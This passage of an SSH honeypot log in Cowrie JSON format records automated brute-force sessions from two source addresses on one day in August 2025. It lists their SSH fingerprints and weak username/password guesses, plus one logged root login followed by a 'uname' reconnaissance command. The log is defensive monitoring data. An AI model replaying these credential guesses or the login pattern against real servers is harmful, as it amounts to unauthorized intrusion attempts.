"diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T10:01:31.079432Z","src_ip":"185.93.89.7","session":"6af3c070ef38"}
{"eventid":"cowrie.login.failed","username":"index","password":"0123456789","message":"login attempt [index/0123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T10:01:31.128279Z","src_ip":"185.93.89.7","session":"6af3c070ef38"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:01:32.154926Z","src_ip":"185.93.89.7","session":"6af3c070ef38"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":58302,"dst_ip":"1.2.3.4","dst_port":22,"session":"8658d50117c6","protocol":"ssh","message":"New connection: 51.79.164.132:58302 (1.2.3.4:22) [session: 8658d50117c6]","sensor":"my-vps","timestamp":"2025-08-28T10:01:35.652875Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:01:35.795892Z","src_ip":"51.79.164.132","session":"8658d50117c6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:01:36.345607Z","src_ip":"51.79.164.132","session":"8658d50117c6"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"123456","message":"login attempt [ftpuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T10:01:38.009290Z","src_ip":"51.79.164.132","session":"8658d50117c6"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:01:39.535973Z","src_ip":"51.79.164.132","session":"8658d50117c6"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":60832,"dst_ip":"1.2.3.4","dst_port":22,"session":"3da5a7e89956","protocol":"ssh","message":"New connection: 185.93.89.7:60832 (1.2.3.4:22) [session: 3da5a7e89956]","sensor":"my-vps","timestamp":"2025-08-28T10:01:55.340729Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:01:55.342160Z","src_ip":"185.93.89.7","session":"3da5a7e89956"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T10:01:55.360190Z","src_ip":"185.93.89.7","session":"3da5a7e89956"}
{"eventid":"cowrie.login.failed","username":"index","password":"a12345","message":"login attempt [index/a12345] failed","sensor":"my-vps","timestamp":"2025-08-28T10:01:55.400442Z","src_ip":"185.93.89.7","session":"3da5a7e89956"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:01:56.420603Z","src_ip":"185.93.89.7","session":"3da5a7e89956"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":57580,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0bcef6cc0c0","protocol":"ssh","message":"New connection: 51.79.164.132:57580 (1.2.3.4:22) [session: e0bcef6cc0c0]","sensor":"my-vps","timestamp":"2025-08-28T10:02:02.044822Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:02:02.775226Z","src_ip":"51.79.164.132","session":"e0bcef6cc0c0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:02:02.775987Z","src_ip":"51.79.164.132","session":"e0bcef6cc0c0"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123456","message":"login attempt [ubuntu/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T10:02:05.799181Z","src_ip":"51.79.164.132","session":"e0bcef6cc0c0"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:02:07.299648Z","src_ip":"51.79.164.132","session":"e0bcef6cc0c0"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":33884,"dst_ip":"1.2.3.4","dst_port":22,"session":"4da7e68ca859","protocol":"ssh","message":"New connection: 185.93.89.7:33884 (1.2.3.4:22) [session: 4da7e68ca859]","sensor":"my-vps","timestamp":"2025-08-28T10:02:19.785019Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:02:19.786409Z","src_ip":"185.93.89.7","session":"4da7e68ca859"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T10:02:19.804309Z","src_ip":"185.93.89.7","session":"4da7e68ca859"}
{"eventid":"cowrie.login.failed","username":"index","password":"789456123","message":"login attempt [index/789456123] failed","sensor":"my-vps","timestamp":"2025-08-28T10:02:19.871469Z","src_ip":"185.93.89.7","session":"4da7e68ca859"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:02:20.891618Z","src_ip":"185.93.89.7","session":"4da7e68ca859"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":41600,"dst_ip":"1.2.3.4","dst_port":22,"session":"065ca00886b5","protocol":"ssh","message":"New connection: 51.79.164.132:41600 (1.2.3.4:22) [session: 065ca00886b5]","sensor":"my-vps","timestamp":"2025-08-28T10:02:28.698769Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:02:29.138179Z","src_ip":"51.79.164.132","session":"065ca00886b5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:02:29.138944Z","src_ip":"51.79.164.132","session":"065ca00886b5"}
{"eventid":"cowrie.login.success","username":"root","password":"QQ123456","message":"login attempt [root/QQ123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:02:33.337785Z","src_ip":"51.79.164.132","session":"065ca00886b5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:02:34.876943Z","src_ip":"51.79.164.132","session":"065ca00886b5"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T10:02:34.877753Z","src_ip":"51.79.164.132","session":"065ca00886b5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:02:35.946173Z","src_ip":"51.79.164.132","session":"065ca00886b5"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:02:35.947375Z","src_ip":"51.79.164.132","session":"065ca00886b5"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":41038,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9c20d2bc9a4","protocol":"ssh","message":"New connection: 185.93.89.7:41038 (1.2.3.4:22) [session: f9c20d2bc9a4]","sensor":"my-vps","timestamp":"2025-08-28T10:02:43.617416Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:02:43.625214Z","src_ip":"185.93.89.7","session":"f9c20d2bc9a4"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T10:02:43.650900Z","src_ip":"185.93.89.7","session":"f9c20d2bc9a4"}
{"eventid":"cowrie.login.failed","username":"index","password":"77777777","message":"login attempt [index/77777777] failed","sensor":"my-vps","timestamp":"2025-08-28T10:02:43.785193Z","src_ip":"185.93.89.7","session":"f9c20d2bc9a4"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:02:44.806149Z","src_ip":"185.93.89.7","session":"f9c20d2bc9a4"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":44428,"dst_ip":"1.2.3.4","dst_port":22,"session":"49ef67fe7958","protocol":"ssh","message":"New connection: 51.79.164.132:44428 (1.2.3.4:22) [session: 49ef67fe7958]","sensor":"my-vps","timestamp":"2025-08-28T10:02:55.035422Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:02:55.139287Z","src_ip":"51.79.164.132","session":"49ef67fe7958"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:02:55.665830Z","src_ip":"51.79.164.132","session":"49ef67fe7958"}
{"eventid":"cowrie.login.failed","username":"esadmin","password":"esadmin","message":"login attempt [esadmin/esadmin] failed","sensor":"my-vps","timestamp":"2025-08-28T10:02:57.142401Z","src_ip":"51.79.164.132","session":"49ef67fe7958"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:02:58.685544Z","src_ip":"51.79.164.132","session":"49ef67fe7958"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":42898,"dst_ip":"1.2.3.4","dst_port":22,"session":"f604750aa7df","protocol":"ssh","message":"New connection: 185.93.89.7:42898 (1.2.3.4:22) [session: f604750aa7df]","sensor":"my-vps","timestamp":"2025-08-28T10:03:08.547966Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:03:08.558342Z","src_ip":"185.93.89.7","session":"f604750aa7df"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T10:03:08.571307Z","src_ip":"185.93.89.7","session":"f604750aa7df"}
{"eventid":"cowrie.login.failed","username":"index","password":"ssssss","message":"login attempt [index/ssssss] failed","sensor":"my-vps","timestamp":"2025-08-28T10:03:08.621968Z","src_ip":"185.93.89.7","session":"f604750aa7df"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:03:09.644067Z","src_ip":"185.93.89.7","session":"f604750aa7df"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":54724,"dst_ip":"1.2.3.4","dst_port":22,"session":"56bd4131653e","protocol":"ssh","message":"New connection: 51.79.164.132:54724 (1.2.3.4:22) [session: 56bd4131653e]","sensor":"my-vps","timestamp":"2025-08-28T10:03:21.662103Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:03:21.964103Z","src_ip":"51.79.164.132","session":"56bd4131653e"}
